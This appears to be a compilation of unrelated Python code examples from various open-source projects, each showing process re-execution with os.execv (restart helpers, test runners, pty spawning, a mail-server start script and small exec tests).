        if opts.quickpkg:
            out.err(
                "Running as an unprivileged user, --quickpkg probably won't work"
            )

    try:
        packages = SmartLiveRebuild(opts, pm, cliargs=args)
    except SLRFailure:
        return 1

    if not packages and not any(filter(lambda a: not a.startswith('-'), args)):
        return 0

    if opts.pretend:
        for p in packages:
            print(p)
        return 0
    else:
        cmd = ['emerge', '--oneshot']
        cmd.extend(args)
        cmd.extend(packages)
        out.s2(' '.join(cmd))
        os.execv('/usr/bin/emerge', cmd)
        return 126
Exemple #39
0
def admin(req, arg):
	"""
	admin"""
	if len(arg):
		command = arg[0]
		arg = arg[1:]
		if command == "reload":
			for mod in arg:
				reload(sys.modules[mod])
			req.reply("Reloaded")
		elif command == "exec" and Config.config.get("enable_exec", None):
			try:
				exec(" ".join(arg).replace("$", "\n"))
			except Exception as e:
				type, value, tb = sys.exc_info()
				Logger.log("ce", "ERROR in " + req.instance + " : " + req.text)
				Logger.log("ce", repr(e))
				Logger.log("ce", "".join(traceback.format_tb(tb)))
				req.reply(repr(e))
				req.reply("".join(traceback.format_tb(tb)).replace("\n", " || "))
				del tb
		elif command == "ignore":
			Irc.ignore(arg[0], int(arg[1]))
			req.reply("Ignored")
		elif command == "die":
			for instance in Global.instances:
				Global.manager_queue.put(("Disconnect", instance))
			Global.manager_queue.join()
			Blocknotify.stop()
			Global.manager_queue.put(("Die",))
		elif command == "restart":
			for instance in Global.instances:
				Global.manager_queue.put(("Disconnect", instance))
			Global.manager_queue.join()
			Blocknotify.stop()
			os.execv(sys.executable, [sys.executable] + sys.argv)
		elif command == "manager":
			for cmd in arg:
				Global.manager_queue.put(cmd.split("$"))
			req.reply("Sent")
		elif command == "raw":
			Irc.instance_send(req.instance, eval(" ".join(arg)))
		elif command == "config":
			if arg[0] == "save":
				os.rename("Config.py", "Config.py.bak")
				with open("Config.py", "w") as f:
					f.write("config = " + pprint.pformat(Config.config) + "\n")
				req.reply("Done")
			elif arg[0] == "del":
				exec("del Config.config " + " ".join(arg[1:]))
				req.reply("Done")
			else:
				try:
					req.reply(repr(eval("Config.config " + " ".join(arg))))
				except SyntaxError:
					exec("Config.config " + " ".join(arg))
					req.reply("Done")
		elif command == "join":
			Irc.instance_send(req.instance, ("JOIN", arg[0]), priority = 0.1)
		elif command == "part":
			Irc.instance_send(req.instance, ("PART", arg[0]), priority = 0.1)
		elif command == "caches":
			acsize = 0
			accached = 0
			with Global.account_lock:
				for channel in Global.account_cache:
					for user in Global.account_cache[channel]:
						acsize += 1
						if Global.account_cache[channel][user] != None:
							accached += 1
			acchannels = len(Global.account_cache)
			whois = " OK"
			whoisok = True
			for instance in Global.instances:
				tasks = Global.instances[instance].whois_queue.unfinished_tasks
				if tasks:
					if whoisok:
						whois = ""
						whoisok = False
					whois += " %s:%d!" % (instance, tasks)
			req.reply("Account caches: %d user-channels (%d cached) in %d channels; Whois queues:%s" % (acsize, accached, acchannels, whois))
		elif command == "channels":
			inss = ""
			for instance in Global.instances:
				chans = []
				with Global.account_lock:
					for channel in Global.account_cache:
						if instance in Global.account_cache[channel]:
							chans.append(channel)
				inss += " %s:%s" % (instance, ",".join(chans))
			req.reply("Instances:" + inss)
		elif command == "balances":
			database, BitBeand = Transactions.balances()
			req.reply("BitBeand: %.8f; Database: %.8f" % (BitBeand, database))
		elif command == "blocks":
			info, hashd = Transactions.get_info()
			hashb = Transactions.lastblock.encode("ascii")
			req.reply("Best block: " + hashd + ", Last tx block: " + hashb + ", Blocks: " + str(info.blocks) + ", Testnet: " + str(info.testnet))
		elif command == "lock":
			if len(arg) > 1:
				if arg[1] == "on":
					Transactions.lock(arg[0], True)
				elif arg[1] == "off":
					Transactions.lock(arg[0], False)
				req.reply("Done")
			elif len(arg):
				req.reply("locked" if Transactions.lock(arg[0]) else "not locked")
		elif command == "ping":
			t = time.time()
			Irc.account_names(["."])
			pingtime = time.time() - t
			acc = Irc.account_names([req.nick])[0]
			t = time.time()
			Transactions.balance(acc)
			dbreadtime = time.time() - t
			t = time.time()
			Transactions.lock(acc, False)
			dbwritetime = time.time() - t
			t = time.time()
			Transactions.ping()
			rpctime = time.time() - t
			req.reply("Ping: %f, DB read: %f, DB write: %f, RPC: %f" % (pingtime, dbreadtime, dbwritetime, rpctime))
Exemple #40
0
def main(argv):
    parser = ArgumentParser(usage=__doc__.lstrip())
    parser.add_argument("--verbose",
                        "-v",
                        action="count",
                        default=1,
                        help="more verbosity")
    parser.add_argument(
        "--no-build",
        "-n",
        action="store_true",
        default=False,
        help="do not build the project (use system installed version)")
    parser.add_argument("--build-only",
                        "-b",
                        action="store_true",
                        default=False,
                        help="just build, do not run any tests")
    parser.add_argument("--doctests",
                        action="store_true",
                        default=False,
                        help="Run doctests in module")
    parser.add_argument("--refguide-check",
                        action="store_true",
                        default=False,
                        help="Run refguide check (do not run regular tests.)")
    parser.add_argument("--coverage",
                        action="store_true",
                        default=False,
                        help=("report coverage of project code. HTML output"
                              " goes under build/coverage"))
    parser.add_argument("--gcov",
                        action="store_true",
                        default=False,
                        help=("enable C code coverage via gcov (requires GCC)."
                              " gcov output goes to build/**/*.gc*"))
    parser.add_argument("--lcov-html",
                        action="store_true",
                        default=False,
                        help=("produce HTML for C code coverage information "
                              "from a previous run with --gcov. "
                              "HTML output goes to build/lcov/"))
    parser.add_argument("--mode",
                        "-m",
                        default="fast",
                        help="'fast', 'full', or something that could be "
                        "passed to nosetests -A [default: fast]")
    parser.add_argument("--submodule",
                        "-s",
                        default=None,
                        help="Submodule whose tests to run (cluster,"
                        " constants, ...)")
    parser.add_argument("--pythonpath",
                        "-p",
                        default=None,
                        help="Paths to prepend to PYTHONPATH")
    parser.add_argument("--tests",
                        "-t",
                        action='append',
                        help="Specify tests to run")
    parser.add_argument("--python",
                        action="store_true",
                        help="Start a Python shell with PYTHONPATH set")
    parser.add_argument("--ipython",
                        "-i",
                        action="store_true",
                        help="Start IPython shell with PYTHONPATH set")
    parser.add_argument("--shell",
                        action="store_true",
                        help="Start Unix shell with PYTHONPATH set")
    parser.add_argument("--debug",
                        "-g",
                        action="store_true",
                        help="Debug build")
    parser.add_argument("--parallel",
                        "-j",
                        type=int,
                        default=1,
                        help="Number of parallel jobs during build (requires "
                        "NumPy 1.10 or greater).")
    parser.add_argument("--show-build-log",
                        action="store_true",
                        help="Show build output rather than using a log file")
    parser.add_argument("--bench",
                        action="store_true",
                        help="Run benchmark suite instead of test suite")
    parser.add_argument("--bench-compare",
                        action="append",
                        metavar="BEFORE",
                        help=("Compare benchmark results of current HEAD to"
                              " BEFORE. Use an additional "
                              "--bench-compare=COMMIT to override HEAD with"
                              " COMMIT. Note that you need to commit your "
                              "changes first!"))
    parser.add_argument("args",
                        metavar="ARGS",
                        default=[],
                        nargs=REMAINDER,
                        help="Arguments to pass to Nose, Python or shell")
    parser.add_argument("--pep8",
                        action="store_true",
                        default=False,
                        help="Perform pep8 check with pycodestyle.")
    args = parser.parse_args(argv)

    if args.pep8:
        # os.system("flake8 scipy --ignore=F403,F841,F401,F811,F405,E121,E122,"
        #           "E123,E125,E126,E127,E128,E226,E231,E251,E265,E266,E302,"
        #           "E402,E501,E712,E721,E731,E741,W291,W293,W391,W503,W504"
        #           "--exclude=scipy/_lib/six.py")
        os.system("pycodestyle scipy benchmarks/benchmarks")
        sys.exit(0)

    if args.bench_compare:
        args.bench = True
        args.no_build = True  # ASV does the building

    if args.lcov_html:
        # generate C code coverage output
        lcov_generate()
        sys.exit(0)

    if args.pythonpath:
        for p in reversed(args.pythonpath.split(os.pathsep)):
            sys.path.insert(0, p)

    if args.gcov:
        gcov_reset_counters()

    if args.debug and args.bench:
        print("*** Benchmarks should not be run against debug version; "
              "remove -g flag ***")

    if not args.no_build:
        site_dir = build_project(args)
        sys.path.insert(0, site_dir)
        os.environ['PYTHONPATH'] = site_dir

    extra_argv = args.args[:]
    if extra_argv and extra_argv[0] == '--':
        extra_argv = extra_argv[1:]

    if args.python:
        if extra_argv:
            # Don't use subprocess, since we don't want to include the
            # current path in PYTHONPATH.
            sys.argv = extra_argv
            with open(extra_argv[0], 'r') as f:
                script = f.read()
            sys.modules['__main__'] = new_module('__main__')
            ns = dict(__name__='__main__', __file__=extra_argv[0])
            exec_(script, ns)
            sys.exit(0)
        else:
            import code
            code.interact()
            sys.exit(0)

    if args.ipython:
        import IPython
        IPython.embed(user_ns={})
        sys.exit(0)

    if args.shell:
        shell = os.environ.get('SHELL', 'sh')
        print("Spawning a Unix shell...")
        os.execv(shell, [shell] + extra_argv)
        sys.exit(1)

    if args.coverage:
        dst_dir = os.path.join(ROOT_DIR, 'build', 'coverage')
        fn = os.path.join(dst_dir, 'coverage_html.js')
        if os.path.isdir(dst_dir) and os.path.isfile(fn):
            shutil.rmtree(dst_dir)
        extra_argv += ['--cov-report=html:' + dst_dir]

    if args.refguide_check:
        cmd = [
            os.path.join(ROOT_DIR, 'tools', 'refguide_check.py'), '--doctests'
        ]
        if args.submodule:
            cmd += [args.submodule]
        os.execv(sys.executable, [sys.executable] + cmd)
        sys.exit(0)

    if args.bench:
        # Run ASV
        items = extra_argv
        if args.tests:
            items += args.tests
        if args.submodule:
            items += [args.submodule]

        bench_args = []
        for a in items:
            bench_args.extend(['--bench', a])

        if not args.bench_compare:
            cmd = [
                os.path.join(ROOT_DIR, 'benchmarks', 'run.py'), 'run', '-n',
                '-e', '--python=same'
            ] + bench_args
            os.execv(sys.executable, [sys.executable] + cmd)
            sys.exit(1)
        else:
            if len(args.bench_compare) == 1:
                commit_a = args.bench_compare[0]
                commit_b = 'HEAD'
            elif len(args.bench_compare) == 2:
                commit_a, commit_b = args.bench_compare
            else:
                p.error("Too many commits to compare benchmarks for")

            # Check for uncommitted files
            if commit_b == 'HEAD':
                r1 = subprocess.call(
                    ['git', 'diff-index', '--quiet', '--cached', 'HEAD'])
                r2 = subprocess.call(['git', 'diff-files', '--quiet'])
                if r1 != 0 or r2 != 0:
                    print("*" * 80)
                    print("WARNING: you have uncommitted changes --- "
                          "these will NOT be benchmarked!")
                    print("*" * 80)

            # Fix commit ids (HEAD is local to current repo)
            p = subprocess.Popen(['git', 'rev-parse', commit_b],
                                 stdout=subprocess.PIPE)
            out, err = p.communicate()
            commit_b = out.strip()

            p = subprocess.Popen(['git', 'rev-parse', commit_a],
                                 stdout=subprocess.PIPE)
            out, err = p.communicate()
            commit_a = out.strip()

            cmd = [
                os.path.join(ROOT_DIR, 'benchmarks', 'run.py'), 'continuous',
                '-e', '-f', '1.05', commit_a, commit_b
            ] + bench_args
            os.execv(sys.executable, [sys.executable] + cmd)
            sys.exit(1)

    if args.build_only:
        sys.exit(0)
    else:
        __import__(PROJECT_MODULE)
        test = sys.modules[PROJECT_MODULE].test

    if args.submodule:
        tests = [PROJECT_MODULE + "." + args.submodule]
    elif args.tests:
        tests = args.tests
    else:
        tests = None

    # Run the tests

    if not args.no_build:
        test_dir = site_dir
    else:
        test_dir = os.path.join(ROOT_DIR, 'build', 'test')
        if not os.path.isdir(test_dir):
            os.makedirs(test_dir)

    shutil.copyfile(os.path.join(ROOT_DIR, '.coveragerc'),
                    os.path.join(test_dir, '.coveragerc'))

    cwd = os.getcwd()
    try:
        os.chdir(test_dir)
        result = test(args.mode,
                      verbose=args.verbose,
                      extra_argv=extra_argv,
                      doctests=args.doctests,
                      coverage=args.coverage,
                      tests=tests,
                      parallel=args.parallel)
    finally:
        os.chdir(cwd)

    if isinstance(result, bool):
        sys.exit(0 if result else 1)
    elif result.wasSuccessful():
        sys.exit(0)
    else:
        sys.exit(1)
Exemple #41
0
#!/usr/bin/env python3
import os

assert os.system("make") == 0
os.environ['LD_LIBRARY_PATH'] = "/system/lib64:" + os.environ['LD_LIBRARY_PATH']
os.execv("./sensord", ["sensord"])
Exemple #42
0
def restart():
    import __main__
    os.execv(__main__.__file__, sys.argv)
Exemple #43
0
def Main(args):
    try:
        mailpile.platforms.DetectBinaries(_raise=OSError)
    except OSError as e:
        binary = str(e).split()[0]
        sys.stderr.write("""
Required binary missing or unusable: %s

If you know where it is, or would like to skip this test and run Mailpile
anyway, you can set one of the following environment variables:

    MAILPILE_%s="/path/to/binary"
or
    MAILPILE_IGNORE_BINARIES="%s"  # Can be a space-separated list

Note that skipping a binary check may cause the app to become unstable or
fail in unexpected ways. If it breaks you get to keep both pieces!

""" % (e, binary.upper(), binary))
        sys.exit(1)

    # Enable our connection broker, try to prevent badly behaved plugins from
    # bypassing it.
    DisableUnbrokeredConnections()

    # Bootstrap translations until we've loaded everything else
    mailpile.i18n.ActivateTranslation(None, ConfigManager, None)
    try:
        # Create our global config manager and the default (CLI) session
        config = ConfigManager(rules=mailpile.config.defaults.CONFIG_RULES)
        session = Session(config)
        cli_ui = session.ui = UserInteraction(config)
        session.main = True
        try:
            CatchUnixSignals(session)
            config.clean_tempfile_dir()
            config.load(session)
        except IOError:
            if config.sys.debug:
                session.ui.error(
                    _('Failed to decrypt configuration, '
                      'please log in!'))
        HealthCheck(session, None, []).run()
        config.prepare_workers(session)
    except AccessError as e:
        session.ui.error('Access denied: %s\n' % e)
        sys.exit(1)

    try:
        try:
            if '--login' in args:
                a1 = args[:args.index('--login') + 1]
                a2 = args[len(a1):]
            else:
                a1, a2 = args, []

            allopts = []
            for argset in (a1, a2):
                shorta, longa = '', []
                for cls in COMMANDS:
                    shortn, longn, urlpath, arglist = cls.SYNOPSIS[:4]
                    if arglist:
                        if shortn:
                            shortn += ':'
                        if longn:
                            longn += '='
                    if shortn:
                        shorta += shortn
                    if longn:
                        longa.append(longn.replace(' ', '_'))

                opts, args = getopt.getopt(argset, shorta, longa)
                allopts.extend(opts)
                for opt, arg in opts:
                    session.ui.display_result(
                        Action(session, opt.replace('-', ''),
                               arg.decode('utf-8')))
                if args:
                    session.ui.display_result(
                        Action(session, args[0],
                               ' '.join(args[1:]).decode('utf-8')))

        except (getopt.GetoptError, UsageError) as e:
            session.fatal_error(unicode(e))

        if (not allopts) and (not a1) and (not a2):
            InteractCommand(session).run()

    except KeyboardInterrupt:
        pass

    except:
        traceback.print_exc()

    finally:
        write_readline_history(session)

        # Make everything in the background quit ASAP...
        mailpile.util.LAST_USER_ACTIVITY = 0
        mailpile.util.QUITTING = mailpile.util.QUITTING or True

        if config.plugins:
            config.plugins.process_shutdown_hooks()

        config.stop_workers()
        if config.index:
            config.index.save_changes()
        if config.event_log:
            config.event_log.close()

        session.ui.display_result(Action(session, 'cleanup', ''))

        if session.interactive and config.sys.debug:
            session.ui.display_result(Action(session, 'ps', ''))

        # Remove anything that we couldn't remove before
        safe_remove()

        # Restart the app if that's what was requested
        if mailpile.util.QUITTING == 'restart':
            os.execv(sys.argv[0], sys.argv)
def main():
    op = optparse.OptionParser()
    op.add_option('--port', dest='port', type='int', default=9988)
    op.add_option('--threads', dest='threads', type='int', default=2)
    op.add_option('--flagfile', dest='flagfile', default=None)
    op.add_option('--log', dest='logname', default=None)
    (options, args) = op.parse_args()

    if options.flagfile:
        (options, args) = read_flagfile(op, open(options.flagfile, 'r'),
                                        options, args)
    elif os.path.exists('flagfile'):
        (options, args) = read_flagfile(op, open('flagfile', 'r'), options,
                                        args)
    rootdir = os.path.dirname(os.path.abspath(__file__))
    bindir = os.path.join(rootdir, 'bin')
    datadir = os.path.join(rootdir, 'data')
    workdir = os.path.join(rootdir, 'work')

    if not os.path.isdir(datadir):
        os.mkdir(datadir)
    if not os.path.isdir(workdir):
        os.mkdir(workdir)

    runallstates = os.path.join(bindir, 'runallstates.py')

    cmd = [
        runallstates, '--bestlog=bestlog', '--runlog=runlog', '--d2',
        '--fr=4/9', '--server=http://bots.bdistricting.net/rd_datasets/',
        '--port=%d' % (options.port, ),
        '--threads=%d' %
        (options.threads, ), '--datadir=' + datadir, '--bindir=' + bindir
    ] + args

    proc = subprocess.Popen(cmd,
                            cwd=workdir,
                            shell=False,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE)

    print('status should be available on')
    print('http://localhost:%d/' % (options.port, ))

    log = None
    if options.logname:
        if options.logname == '-':
            logpath = None
            log = sys.stdout
        else:
            logpath = options.logname
    else:
        logpath = os.path.join(workdir, 'dblog_')
    if log is None:
        log = RotatingLogWriter(logpath)
    log.write('# cmd: "%s"\n' % ('" "'.join(cmd), ))
    piped_run(proc, log)
    log.close()

    reloadmarker = os.path.join(workdir, 'reload')
    if os.path.exists(reloadmarker):
        os.unlink(reloadmarker)
        os.execv(__file__, sys.argv)
Exemple #45
0
def launchWithName(name):
    if name and name != sys.argv[0]:
        exe = os.path.realpath(sys.executable)
        log.msg('Changing process name to ' + name)
        os.execv(exe, [name, sys.argv[0], '--originalname'] + sys.argv[1:])
Exemple #46
0
    def spawn(cls,
              argv,
              cwd=None,
              env=None,
              echo=True,
              preexec_fn=None,
              dimensions=(24, 80)):
        '''Start the given command in a child process in a pseudo terminal.

        This does all the fork/exec type of stuff for a pty, and returns an
        instance of PtyProcess.

        If preexec_fn is supplied, it will be called with no arguments in the
        child process before exec-ing the specified command.
        It may, for instance, set signal handlers to SIG_DFL or SIG_IGN.

        Dimensions of the psuedoterminal used for the subprocess can be
        specified as a tuple (rows, cols), or the default (24, 80) will be used.
        '''
        # Note that it is difficult for this method to fail.
        # You cannot detect if the child process cannot start.
        # So the only way you can tell if the child process started
        # or not is to try to read from the file descriptor. If you get
        # EOF immediately then it means that the child is already dead.
        # That may not necessarily be bad because you may have spawned a child
        # that performs some task; creates no stdout output; and then dies.

        if not isinstance(argv, (list, tuple)):
            raise TypeError("Expected a list or tuple for argv, got %r" % argv)

        # Shallow copy of argv so we can modify it
        argv = argv[:]
        command = argv[0]

        command_with_path = which(command)
        if command_with_path is None:
            raise FileNotFoundError('The command was not found or was not ' +
                                    'executable: %s.' % command)
        command = command_with_path
        argv[0] = command

        # [issue #119] To prevent the case where exec fails and the user is
        # stuck interacting with a python child process instead of whatever
        # was expected, we implement the solution from
        # http://stackoverflow.com/a/3703179 to pass the exception to the
        # parent process

        # [issue #119] 1. Before forking, open a pipe in the parent process.
        exec_err_pipe_read, exec_err_pipe_write = os.pipe()

        if use_native_pty_fork:
            pid, fd = pty.fork()
        else:
            # Use internal fork_pty, for Solaris
            pid, fd = _fork_pty.fork_pty()

        # Some platforms must call setwinsize() and setecho() from the
        # child process, and others from the master process. We do both,
        # allowing IOError for either.

        if pid == CHILD:
            # set window size
            try:
                _setwinsize(STDIN_FILENO, *dimensions)
            except IOError as err:
                if err.args[0] not in (errno.EINVAL, errno.ENOTTY):
                    raise

            # disable echo if spawn argument echo was unset
            if not echo:
                try:
                    _setecho(STDIN_FILENO, False)
                except (IOError, termios.error) as err:
                    if err.args[0] not in (errno.EINVAL, errno.ENOTTY):
                        raise

            # [issue #119] 3. The child closes the reading end and sets the
            # close-on-exec flag for the writing end.
            os.close(exec_err_pipe_read)
            fcntl.fcntl(exec_err_pipe_write, fcntl.F_SETFD, fcntl.FD_CLOEXEC)

            # Do not allow child to inherit open file descriptors from parent,
            # with the exception of the exec_err_pipe_write of the pipe
            # Impose ceiling on max_fd: AIX bugfix for users with unlimited
            # nofiles where resource.RLIMIT_NOFILE is 2^63-1 and os.closerange()
            # occasionally raises out of range error
            max_fd = min(1048576,
                         resource.getrlimit(resource.RLIMIT_NOFILE)[0])
            os.closerange(3, exec_err_pipe_write)
            os.closerange(exec_err_pipe_write + 1, max_fd)

            if cwd is not None:
                os.chdir(cwd)

            if preexec_fn is not None:
                try:
                    preexec_fn()
                except Exception as e:
                    ename = type(e).__name__
                    tosend = '{}:0:{}'.format(ename, str(e))
                    if PY3:
                        tosend = tosend.encode('utf-8')

                    os.write(exec_err_pipe_write, tosend)
                    os.close(exec_err_pipe_write)
                    os._exit(1)

            try:
                if env is None:
                    os.execv(command, argv)
                else:
                    os.execvpe(command, argv, env)
            except OSError as err:
                # [issue #119] 5. If exec fails, the child writes the error
                # code back to the parent using the pipe, then exits.
                tosend = 'OSError:{}:{}'.format(err.errno, str(err))
                if PY3:
                    tosend = tosend.encode('utf-8')
                os.write(exec_err_pipe_write, tosend)
                os.close(exec_err_pipe_write)
                os._exit(os.EX_OSERR)

        # Parent
        inst = cls(pid, fd)

        # Set some informational attributes
        inst.argv = argv
        if env is not None:
            inst.env = env
        if cwd is not None:
            inst.launch_dir = cwd

        # [issue #119] 2. After forking, the parent closes the writing end
        # of the pipe and reads from the reading end.
        os.close(exec_err_pipe_write)
        exec_err_data = os.read(exec_err_pipe_read, 4096)
        os.close(exec_err_pipe_read)

        # [issue #119] 6. The parent reads eof (a zero-length read) if the
        # child successfully performed exec, since close-on-exec made
        # successful exec close the writing end of the pipe. Or, if exec
        # failed, the parent reads the error code and can proceed
        # accordingly. Either way, the parent blocks until the child calls
        # exec.
        if len(exec_err_data) != 0:
            try:
                errclass, errno_s, errmsg = exec_err_data.split(b':', 2)
                exctype = getattr(builtins, errclass.decode('ascii'),
                                  Exception)

                exception = exctype(errmsg.decode('utf-8', 'replace'))
                if exctype is OSError:
                    exception.errno = int(errno_s)
            except:
                raise Exception('Subprocess failed, got bad error data: %r' %
                                exec_err_data)
            else:
                raise exception

        try:
            inst.setwinsize(*dimensions)
        except IOError as err:
            if err.args[0] not in (errno.EINVAL, errno.ENOTTY, errno.ENXIO):
                raise

        return inst
#!/usr/bin/python
# Point the external lookup to this script.
# Replace real_script with the name/location of your script
# This was found on Splunk forums.

import os, sys
for envvar in ("PYTHONPATH", "LD_LIBRARY_PATH"):
    if envvar in os.environ:
        del os.environ[envvar]
python_executable = "/opt/splunk/bin/python"
real_script = "/opt/splunk/etc/apps/ThreatHunting/bin/vtLookup.py"
os.execv(python_executable, [ python_executable, real_script ] + sys.argv[1:])
Exemple #48
0
def main():
    # Bypass all of chromite_wrappers attempted 'help', and execve to the actual
    # cros_sdk wrapper/helper chromite has.
    location = os.path.dirname(os.path.abspath(__file__))
    location = os.path.join(location, 'cros_sdk')
    os.execv(location, [location] + sys.argv[1:])
Exemple #49
0
    try:
        import wiredtiger
    except:
        # If the .libs directory is not in our library search path,
        # we need to set it and retry.  However, the dynamic link
        # library has already cached its value, our only option is
        # to restart the Python interpreter.
        if '_workgen_init' not in os.environ:
            os.environ['_workgen_init'] = 'true'
            dotlibs = os.path.join(wt_builddir, '.libs')
            _prepend_env_path('LD_LIBRARY_PATH', dotlibs)
            _prepend_env_path('DYLD_LIBRARY_PATH', dotlibs)
            py_args = sys.argv
            py_args.insert(0, sys.executable)
            try:
                os.execv(sys.executable, py_args)
            except Exception as exception:
                print('re-exec failed: ' + str(exception), file=sys.stderr)
                print('  exec(' + sys.executable + ', ' + str(py_args) + ')')
                print('Try adding "' + dotlibs + '" to the', file=sys.stderr)
                print('LD_LIBRARY_PATH environment variable before running ' + \
                    'this program again.', file=sys.stderr)
                sys.exit(1)

try:
    import workgen
except:
    sys.path.insert(0, os.path.join(workgen_src, 'workgen'))
    sys.path.insert(0, os.path.join(wt_builddir, 'bench', 'workgen'))
    import workgen
def main():
	def print_results(action=None):
		printed=False
		results=store.get_result(action)
		status=store.get_status(action)
		if not 'status' in status.keys():
			status['status']=1
			status['msg']='package not found'
		processed=[]
		print ("")
		for action in results.keys():
			if action in actions and not actionList[action]:
				if status['status']==0:
					print (_(u"Results for ")+_(action))
					for data in results[action]:
						if action=='info':
							try:
								print(color.DARKCYAN+_(u'Package')+': '+color.END + data['package'])
								print(_(u'Name')+': '+data['name'])
								print(_(u'ID')+': '+data['id'])
								print(_(u'Version')+': '+data['version'])
								print(_(u'Size')+': '+data['size'])
								print(_(u'License')+': '+data['license'])
								listCat=[]
								for cat in data['categories']:
									listCat.append(_(cat))
								print(_(u'Categories')+': '+','.join(listCat))
								msg=''
								if data['state']=='installed':
									msg=_('installed')
								else:
									msg=_('available')
								if data['updatable']:
									msg +=_(' (updatable)')
								print(_(u'Status')+': '+msg)
								print(_(u'Summary')+': '+data['summary'])
								desc=(html2text.html2text(data['description'],"lxml"))
								print(_(u'Description')+': '+desc)
								pkgString=[]
								for dependency in data['depends']:
										pkgName=dependency.split(';')[0]
										pkgString.append(pkgName)
								print(_(u'Depends')+': '+', '.join(pkgString))
								print("")
							except Exception as e:
								print("CLI: Error printing key %s"%e)
						elif action=='search':
							#Only print name and summary
							data_id=''
							printcolor=color.DARKCYAN
							if data['bundle']:
								printcolor=color.PURPLE
							elif (data['package'] not in data['id'] or data['package'] in processed):
								data_id=" (%s)"%data['id']
							else:
								processed.append(data['package'])
							print("%s%s%s%s: %s"%(printcolor,data['package'],data_id,color.END,data['summary']))

						elif action=='list':
							#Print package, summary and status
							try:
								if data['package']:
									package=data['package']
								else:
									package=data['name']
								if data['state']=='installed':
									msg=_('installed')
								else:
									msg=_('available')
								print(color.DARKCYAN+package+color.END+": "+data['summary']+' ('+','.join(data['categories'])+')'+' ('+msg+')')
							except Exception as e:
								print(_(u'Error listing')+ ':'+str(e))
								pass
						elif action=='install':
								print(color.DARKCYAN+data['package']+color.END+" "+ _(u"installed")+" "+color.BOLD+ _(u"succesfully")+color.END)
						elif action=='remove':
								print(color.DARKCYAN+data['package']+color.END+" "+ _(u"removed")+" "+color.BOLD+ _(u"succesfully")+color.END)
						else:
							print("RESULT:\n%s"%data)
				else:
					msg=_(u"Unable to")+' '+_(action)
					failed=parms[action]
					if (action=='search' or action=='info'):
							msg=_(u"Unable to show")
					if action=='list':
							failed=', '.join(failed)

					print (color.RED+_(u"Error")+": "+color.END+msg+' '+failed+' ('+_(status['msg'])+')')
				printed=True
		return(printed)
	#def print_results

	CURSOR_UP='\033[F'
	ERASE_LINE='\033[K'
	actions=[]
	parms={}
	dbg=False
	appimage=False
	snap=False
	flatpak=False
	autostart=True
	args=process_Args(sys.argv)
#	if args.debug:
#		dbg=True
	if args.appimage:
		appimage=True
	if args.flatpak:
		flatpak=True
	if args.snap:
		snap=True
	if args.update:
		actions.append('cache')
		parms['cache']=None
		autostart=False
	if args.view:
		actions.append('info')
		parms['info']=args.view
	if args.search:
		actions.append('search')
		parms['search']=args.search
	if args.install:
		actions.append('install')
		parms['install']=args.install
	if args.remove:
		actions.append('remove')
		parms['remove']=args.remove
#	if args.random:
#		actions.append('random')
#		parms['random']=args.random
#	if args.list:
#		actions.append('list')
#		parms['list']=args.list

	actionList={'search':False,'info':False,'pkgInfo':False,'install':False,'remove':False,'list':False,'list-sections':False,'random':False,'cache':False}
	#Replace with rebost
	for action in actions:
		parms=str(parms[action])
		if action in ["view","v","info"]:
			action="show"
		os.execv("/usr/bin/rebost",["/usr/bin/rebost",action,parms])
	start_time=time.time()
	store=storeManager.StoreManager(flatpak=flatpak,appimage=appimage,snap=snap,dbg=dbg,autostart=autostart,cli=True)
	for action in actions:
		th=threading.Thread(target=store.execute_action, args = (action,parms[action]))
		th.start()
		actionList[action]=False
		
	inc=0
	banner=' '.join(actions)
	banner='LliureX Store'
	numchar=len(banner)
	os.system('setterm -cursor off')
	while store.is_action_running():
		ini=banner[0:numchar]
		end=banner[numchar:inc]
		text=ini+' '+end
		print(text+'                 ',end='\r')
		numchar-=1
		inc+=1
		time.sleep(0.2)
		if numchar<0:
			numchar=len(banner)
			inc=0
	print("")
	print (CURSOR_UP + ERASE_LINE)
	for key in actionList:
		progressDic=store.get_progress(key)
		if key in progressDic:
				if progressDic[key]==100 and not actionList[key]:
					actionList[key]=print_results(key)
	print_results()
	os.system('setterm -cursor on')
Exemple #51
0
 def test_execv_no_args():
     with raises(ValueError):
         os.execv("notepad", [])
     # PyPy needs at least one arg, CPython 2.7 is fine without
     with raises(ValueError):
         os.execve("notepad", [], {})
Exemple #52
0
 def test_execv_raising2():
     for n in 3, [3, "a"]:
         with raises(TypeError):
             os.execv("xxx", n)
Exemple #53
0
 def restart(self):
     logger.info("Restarting the market maker...")
     os.execv(sys.executable, [sys.executable] + sys.argv)
Exemple #54
0
 def test_execv_raising():
     with raises(OSError):
         os.execv("saddsadsadsadsa", ["saddsadsasaddsa"])
Exemple #55
0
os.environ["HOST_LMTP"] = os.environ.get("HOST_LMTP", "imap:2525")

for postfix_file in glob.glob("/conf/*.cf"):
    convert(postfix_file,
            os.path.join("/etc/postfix", os.path.basename(postfix_file)))

if os.path.exists("/overrides/postfix.cf"):
    for line in open("/overrides/postfix.cf").read().strip().split("\n"):
        os.system('postconf -e "{}"'.format(line))

if os.path.exists("/overrides/postfix.master"):
    for line in open("/overrides/postfix.master").read().strip().split("\n"):
        os.system('postconf -Me "{}"'.format(line))

for map_file in glob.glob("/overrides/*.map"):
    destination = os.path.join("/etc/postfix", os.path.basename(map_file))
    shutil.copyfile(map_file, destination)
    os.system("postmap {}".format(destination))
    os.remove(destination)

convert("/conf/rsyslog.conf", "/etc/rsyslog.conf")

# Run Podop and Postfix
multiprocessing.Process(target=start_podop).start()
if os.path.exists("/var/run/rsyslogd.pid"):
    os.remove("/var/run/rsyslogd.pid")
os.system(
    "/usr/lib/postfix/post-install meta_directory=/etc/postfix create-missing")
os.system("/usr/lib/postfix/master &")
os.execv("/usr/sbin/rsyslogd", ["rsyslogd", "-n"])
Exemple #56
0
# clever in our analysis that discards that code, I used `if UNKNOWN` instead
#
# below, `path` is an relative/absolute path, for the `p` variants this could also be
# the name of a executable, which will be looked up in the PATH environment variable,
# which we call `file` to highlight this difference.
#
# These are also modeled as FileSystemAccess, although they are not super relevant for
# the path-injection query -- a user being able to control which program is executed
# doesn't sound safe even if that is restricted to be within a certain directory.
if UNKNOWN:
    env = {"FOO": "foo"}
    os.execl("path", "<progname>", "arg0")  # $ getCommand="path" getAPathArgument="path"
    os.execle("path", "<progname>", "arg0", env)  # $ getCommand="path" getAPathArgument="path"
    os.execlp("file", "<progname>", "arg0")  # $ getCommand="file" getAPathArgument="file"
